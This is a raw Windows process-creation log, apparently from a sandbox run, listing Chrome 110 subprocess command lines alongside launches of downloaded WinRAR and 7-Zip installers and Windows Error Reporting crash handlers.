"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3600 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4508 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4648 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4228 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4164 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3252 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4844 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3256 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=1748 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3612 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=2548 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4376 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=2460 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4752 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4032 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5196 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4584 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4964 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5196 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5284 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Users\Admin\Downloads\winrar-x64-701.exe
"C:\Users\Admin\Downloads\winrar-x64-701.exe"
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\21863f3a269e42f792ed512f378898ac /t 4868 /p 5240
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdd0dbab58,0x7ffdd0dbab68,0x7ffdd0dbab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1608 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1896 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2228 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3056 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3064 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4336 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4468 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4628 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4656 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3156 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3232 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4392 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4612 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4960 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4984 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5140 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4428 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5172 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8
C:\Users\Admin\Downloads\7z2405-x64.exe
"C:\Users\Admin\Downloads\7z2405-x64.exe"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0x80,0x108,0x7ffdd0dbab58,0x7ffdd0dbab68,0x7ffdd0dbab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1796 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1984 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1680 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3104 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3112 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3668 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4384 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4552 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4700 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4800 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4712 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4856 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4548 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4716 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4372 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4664 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2f4 0x3b8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4864 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4848 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5508 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5852 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5476 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2752 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5624 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe"
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\386efc0b13014c9fa5fa915c94bab0c1 /t 1924 /p 3648
C:\Users\Admin\Downloads\winrar-x64-701.exe
"C:\Users\Admin\Downloads\winrar-x64-701.exe"
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\5e3ef59a3131498abf8e25a896e63c8d /t 2460 /p 3492
C:\Users\Admin\Downloads\winrar-x64-701.exe
"C:\Users\Admin\Downloads\winrar-x64-701.exe"
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\27594d8dceff427db694febdc1835c28 /t 3032 /p 5484
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xbc,0x108,0x7ffdd0dbab58,0x7ffdd0dbab68,0x7ffdd0dbab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1768 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2240 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3080 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3096 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4440 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4396 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4760 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4824 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4288 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3168 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
